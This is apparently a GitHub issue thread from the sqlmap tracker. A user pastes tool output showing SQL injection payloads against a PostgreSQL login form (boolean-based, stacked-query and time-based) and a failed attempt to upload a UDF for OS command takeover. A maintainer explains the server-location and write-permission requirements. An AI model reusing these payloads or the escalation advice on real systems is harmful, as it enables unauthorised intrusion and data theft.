Postgres - Odd UDF/file/OS operation behaivor

[infernusdomoso]

Not sure if this is a bug, or a bizarre condition of the specific database, but I'm testing an injection and it's performing very oddy. Sorry if this isn't the right place for a support question, I wasn't sure where else to ask.

The database is postgresql. The vulnerable statement is a select. In particular, the password field on a login form is injectable. (Yes, the password is not hashed/it's stored in plain text. Unbelievable). I am positive of this as a local file inclusion vulnerability gives me the ability to read the contents of most php files on the server.

Error based injection was correctly identified, (log in succeeds, injection worked. Log in fails, error), and I'm sure to discard cookies (that one drove me nuts for a few hours).

I can enumerate databases, tables, columns, etc, however, not a single thing I do with os-shell, os-cmd, file-read... none of it works.

It will check to see if a module has been uploaded, then hang, then switch to a time based check, then "seem" to read something, returning empty data, then fail and say it cannot be done.

The DB user is a dba (as far as --is-dba is concerned). The injection is on a select statement. Stacked queries are available.

Is there any good reason the other operations would not work?

Here's a copy of the output:

[10:10:59] [INFO] testing connection to the target URL

Parameter: password (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=test1&flag=login&password=test1' AND 4952=4952 AND 'TJtW'='TJtW

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=test1&flag=login&password=test1';SELECT PG_SLEEP(5)--

Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=test1&flag=login&password=test1' AND 1385=(SELECT 1385 FROM PG_SLEEP(5)) AND 'dTlV'='dTlV

---

[10:11:02] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: PostgreSQL
[10:11:02] [INFO] fingerprinting the back-end DBMS operating system
[10:11:04] [INFO] the back-end DBMS operating system is Linux
[10:11:05] [INFO] testing if current user is DBA
[10:11:07] [INFO] detecting back-end DBMS version from its banner
[10:11:07] [INFO] retrieving the length of query output
[10:11:07] [INFO] retrieved: 6
[10:11:30] [INFO] retrieved: 9.1.11
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit

1
[10:11:30] [INFO] checking if UDF 'sys_eval' already exist <-- This line completes quickly
[10:11:30] [INFO] checking if UDF 'sys_exec' already exist <-- This hangs for a while
[10:11:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[10:11:48] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:11:52] [INFO] retrieving the length of query output
[10:11:52] [INFO] retrieved: <--- hangs for a bit as if it were retrieving data
[10:11:54] [INFO] retrieved: <--- same
[10:11:55] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[10:11:55] [INFO] retrieved: <--- again, hangs as if retrieving data
[10:12:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:12:00] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
[10:12:02] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] N
[10:12:02] [CRITICAL] unable to mount the operating system takeover

[infernusdomoso]

I've since come to learn that the DB server is not actually on the web server - that being said - shouldnt an OS command like 'ls' still return data however?

[stamparm]

But the UDF has to be written and created on the same server where DBMS is
located
On Jun 9, 2015 7:33 PM, "infernusdomoso" [email protected] wrote:

I've since come to learn that the DB server is not actually on the web
server - that being said - shouldnt an OS command like 'ls' still return
data however?

—
Reply to this email directly or view it on GitHub
#1263 (comment)
.

[stamparm]

Disregard last comment. This looks like a duplicate of #1170

[stamparm]

Also, DBMS has to have write access rights. DBMs admin is not the same as root

[infernusdomoso]

Aah. I'm 100x more familiar with MySQL - so in postgres --is-dba is not enough, it has to be the root account? I havent yet seen which permission needs to be set to do psql UDF's.

[stamparm]

I am closing this one down as duplicate of #1170. There is a MAJOR issue in PostgreSQL that we need to handle.